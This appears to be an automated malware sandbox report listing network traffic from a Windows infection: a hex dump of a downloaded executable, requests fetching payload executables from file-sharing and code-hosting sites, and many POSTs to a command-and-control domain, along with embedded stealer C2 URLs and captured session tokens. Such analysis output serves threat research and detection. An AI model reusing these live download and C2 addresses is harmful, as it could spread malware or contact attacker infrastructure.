                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 19 Nov 2022 15:58:49 GMTContent-Type: application/octet-streamContent-Length: 129024Last-Modified: Wed, 09 Nov 2022 16:43:53 GMTConnection: keep-aliveETag: "636bd8c9-1f800"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 9c 01 00 00 58 00 00 00 00 00 00 7c aa 01 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 02 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 f0 01 00 4f 00 00 00 00 e0 01 00 26 0e 00 00 00 20 02 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 e0 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 94 9a 01 00 00 10 00 00 00 9c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 b4 13 00 00 00 b0 01 00 00 14 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 e1 09 00 00 00 d0 01 00 00 00 00 00 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 26 0e 00 00 00 e0 01 00 00 10 00 00 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 4f 00 00 00 00 f0 01 00 00 02 00 00 00 c4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 e0 1d 00 00 00 00 02 00 00 1e 00 00 00 c6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 14 00 00 00 20 02 00 00 14 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 00 00 00 00 00 f8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitContent-type: text/xmlX-MSEdge-ExternalExpType: JointCoordX-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40X-PositionerType: DesktopX-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -420X-BM-FirstEnabledTime: 132061295966656129X-DeviceID: 0100748C09004E33X-BM-DeviceScale: 100X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-BM-DeviceDimensionsLogical: 1232x1024X-BM-DeviceDimensions: 1232x1024X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3DX-Agent-DeviceId: 0100748C09004E33X-BM-CBT: 1660685844X-Device-isOptin: trueX-Device-Touch: falseX-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderAccept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: www.bing.comContent-Length: 89192Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1668905810762&AC=1&CPH=4ef661f2; SRCHUID=V=2&GUID=DAC8A2EE305D4BBA834A5F5CB6605BDF&dmnchg=1; SRCHD=AF=NOFORM; SUID=M; SRCHUSR=DOB=20221119; SRCHHPGUSR=SRCHLANG=en; MUIDB=1E17B9B70E9B4C6E957D159ED3646FFF
                      Source: global trafficHTTP traffic detected: GET /mmm.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: srshf.com
                      Source: global trafficHTTP traffic detected: GET /2bibu4 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: iplogger.com
                      Source: global trafficHTTP traffic detected: GET /p8DdCeH9yd/c1844f86-1668548628/TELEGRAM.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn-102.anonfiles.com
                      Source: global trafficHTTP traffic detected: GET /p8DdCeH9yd HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: anonfiles.com
                      Source: global trafficHTTP traffic detected: GET /get/3m3jFz/A.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
                      Source: global trafficHTTP traffic detected: GET /ugzpqm9.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: hoteldostyk.com
                      Source: global trafficHTTP traffic detected: GET /get/tSjRYH/19a79daddfaac09499e79ade27e756f8.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
                      Source: global trafficHTTP traffic detected: GET /decoder1989/Wallet/raw/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
                      Source: global trafficHTTP traffic detected: GET /decoder1989/Wallet/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: raw.githubusercontent.com
                      Source: global trafficHTTP traffic detected: GET /globallinstall/updatenow1.3.5/downloads/downloadsupdated.now-1.3.5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bitbucket.org
                      Source: global trafficHTTP traffic detected: GET /d4f3490a-2e84-4c12-88ef-beba9da933c3/downloads/82212016-bde4-4df5-aab8-956b348984a7/downloadsupdated.now-1.3.5.exe?response-content-disposition=attachment%3B%20filename%3D%22downloadsupdated.now-1.3.5.exe%22&AWSAccessKeyId=ASIA6KOSE3BNOZOOHY3N&Signature=GzL5wNnYpYwPSxOn1UYsedXak5E%3D&x-amz-security-token=FwoGZXIvYXdzEGkaDDNVNRyg9tKrdDSjmyK%2BAXLhpeezu2dvyjwAVkUCy7lu%2FXCp1HgdKpL8mWGBdvveL8Mo1QmIKfJ8iZDr9Xw%2BctzLwJ5Sf8n0lCS3jHhbhlYs0X0busuSvW%2FVq%2FfMaY78aRaS988rXTG%2FflifkvhzKIeH%2BV49O7mXy47GBzjy3fPmNnCGaKTJZeSSWbSd72NLL%2BaCGtTc9Tc3XZ5ZqTwHNQpXotjT6eruy14GLWwhFcV6JdFES%2Flh7KQl3xIhJb9lB%2FMhsn%2BO2tK9c9Nn06YoifbjmwYyLaTpvNZdDFBcQvsXCLyHYDaiEW7KrV%2Fc7h%2BKDDqJqtgq%2BRvSwG3A3zzYSvK0GQ%3D%3D&Expires=1668874769 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bbuseruploads.s3.amazonaws.com
                      Source: global trafficHTTP traffic detected: GET /deadftx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
                      Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
                      Source: global trafficHTTP traffic detected: POST /ppsecure/deviceaddcredential.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 7598Host: login.live.com
                      Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
                      Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
                      Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
                      Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4740Host: login.live.com
                      Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4740Host: login.live.com
                      Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4740Host: login.live.com
                      Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4702Host: login.live.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ijksciexii.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bpbdsdk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://umixvvejem.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qqfarpecak.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 365Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oorjfnwj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://awjddgg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 137Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vewejolrw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ttvgdova.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ujapeckwwf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 206Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://llobgypg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bqrca.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 170Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vovqsb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xqiywpnnx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: GET /mia/solt.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.56.146.168
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hebuwvwfs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kjwivofpbv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uflscskn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wnamt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 251Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pbxlqwo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 217Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hpnwth.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uilamexewu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xqqjug.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 351Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eewqpkgoat.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ipmxouwmp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 365Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pccxxtjnt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dygmllr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mwcxqjbc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pmgurxcfse.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 127Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://anhnwnhtgc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xqculhri.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lruucyh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 209Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: GET /uploaded/MKJXzaDhWJDhe4sLrAp/202wE1vmJGyOwE4wnEYueW/_2FfFWmpLaA_2/F_2BQz5L/X3BHK9zQ3HPerTbhJpXzdiC/pUWTziFQ6a/6yCvS5D9SUcdt4sBF/gRv1MAfNJypf/45_2BAajPNT/d0DhscZUUsYYbj/GTcrjG7fiLjLppaaVvzrf/Y24KXriHXc3NY43T/ctpVATPI_2Fr0Pi/_2FHw6oRT9JyY2ksfC/Ba_2BHWOY/RtKKX_2BievpS4UJpDK8/QiXiZjxP9y_2Fi9Irvn/1tIj7yvgcoxlqHZDD_2FkN/cDourswJ/7.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: iujdhsndjfks.ruConnection: Keep-AliveCache-Control: no-cache
                      Source: Joe Sandbox ViewASN Name: ITOOLS-ASiToolsJSCMN ITOOLS-ASiToolsJSCMN
                      Source: Joe Sandbox ViewIP Address: 65.21.213.208 65.21.213.208
                      Source: global trafficTCP traffic: 192.168.2.3:49801 -> 212.8.246.157:32348
                      Source: global trafficTCP traffic: 192.168.2.3:49824 -> 65.21.213.208:3000
                      Source: global trafficTCP traffic: 192.168.2.3:49893 -> 185.106.92.111:2510
                      Source: EB2B.exe, 0000001C.00000002.454935093.0000000000B40000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 0000001F.00000002.471247692.0000000000C50000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000002.519975927.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://116.202.2.1:80
                      Source: EB2B.exe, 0000001C.00000002.454935093.0000000000B40000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 0000001F.00000002.471247692.0000000000C50000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000002.519975927.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://116.202.2.1:80checkmyprofileonthispage0;open_open
                      Source: EB2B.exe, 00000024.00000002.525842671.0000000002EB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.202.5.101:80
                      Source: EB2B.exe, 00000024.00000002.521653290.0000000000F9D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://116.202.5.101:80/446391140202.zip
                      Source: rovwer.exe, 0000000E.00000002.801547288.0000000000AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php
                      Source: rovwer.exe, 0000000E.00000002.802911113.0000000000ADF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php6e2227
